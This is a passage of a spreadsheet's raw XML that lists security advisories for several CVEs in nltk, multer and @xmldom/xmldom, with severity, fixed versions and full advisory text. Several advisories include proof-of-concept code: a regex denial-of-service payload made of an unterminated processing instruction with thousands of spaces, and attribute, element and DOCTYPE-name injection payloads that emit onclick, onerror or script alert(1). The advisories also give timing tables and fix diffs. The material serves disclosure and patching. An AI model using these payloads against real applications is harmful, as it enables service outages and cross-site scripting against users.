    print("\n✅ Confirmed: exponential growth (catastrophic backtracking).")
    print("   Larger n (≥ 35) will hang indefinitely.")
```

When run, the output shows a clear exponential increase (factor &gt; 3.0 per +2 in n), proving the vulnerability.


### Impact
In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.

### Remediation
This issue remains unfixed in versions `&lt;= 3.10.2`. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D46" s="5" t="inlineStr" /><c r="E46" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.002</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr" /><c r="K46" s="5" t="inlineStr" /><c r="L46" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M46" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N46" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr" /><c r="S46" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D47" s="5" t="inlineStr" /><c r="E47" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.003</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr" /><c r="K47" s="5" t="inlineStr" /><c r="L47" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M47" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N47" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr" /><c r="S47" s="5" t="inlineStr"><is><t>### Impact

multer is vulnerable to a Denial of Service (DoS) via a crafted array index in multipart field names. The `append-field` dependency parses bracket notation in field names, and a large numeric index such as `items[4294967294]` forces allocation of a maximum-length sparse array. A following field with a non-numeric key on the same base then converts that array to an object by iterating its full length, which consumes CPU synchronously and leaves the process unable to handle other requests. A single HTTP request with a crafted multipart body is sufficient to exploit this, and it affects multer 1.x and 2.x.

### Patches

Users should upgrade to `2.3.0` and configure `limits.fieldArrayIndexLimit` to the minimum array index their application requires.

### Workarounds

None.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D48" s="5" t="inlineStr" /><c r="E48" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.003</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M48" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N48" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr" /><c r="S48" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D49" s="5" t="inlineStr" /><c r="E49" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.003</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr" /><c r="L49" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M49" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N49" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr" /><c r="S49" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D50" s="5" t="inlineStr" /><c r="E50" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M50" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N50" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr" /><c r="S50" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid name with `InvalidCharacterError`, xmldom accepts it — developers may assume the same safety and skip validation.

## Fix Applied

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain
&gt; vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that
&gt; serialize untrusted DOM content should audit all `serializeToString()` call sites and add it.

When `{ requireWellFormed: true }` is passed, the serializer now validates each element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element names verbatim, matching the `XMLSerializer` behavior of Chrome, Firefox, and Safari. Unconditionally throwing would be a behavioral breaking change with no spec justification; the opt-in `requireWellFormed: true` flag lets applications that require injection safety enable strict mode without breaking existing code.

### Residual limitation

`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D51" s="5" t="inlineStr" /><c r="E51" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.003</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M51" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N51" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr" /><c r="S51" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
